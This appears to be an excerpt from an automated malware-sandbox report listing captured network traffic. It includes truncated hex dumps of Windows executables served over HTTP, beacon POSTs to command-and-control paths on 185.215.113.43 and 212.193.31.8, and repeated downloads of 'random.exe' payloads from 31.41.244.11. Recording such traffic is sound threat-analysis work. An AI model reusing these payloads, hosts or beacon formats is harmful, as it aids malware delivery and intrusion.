                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:42 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 22 Dec 2024 01:18:42 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Sun, 22 Dec 2024 00:17:01 GMTConnection: keep-aliveETag: "67675a7d-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 73 78 67 75 7a 6e 6e 00 60 2a 00 00 a0 00 00 00 50 2a 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6b 73 63 6b 62 66 75 00 20 00 00 00 00 2b 00 00 04 00 00 00 b8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 22 Dec 2024 01:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019800001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019801001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019802001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/zhigarko/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019803001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /files/kardanvalov88/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019804001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: 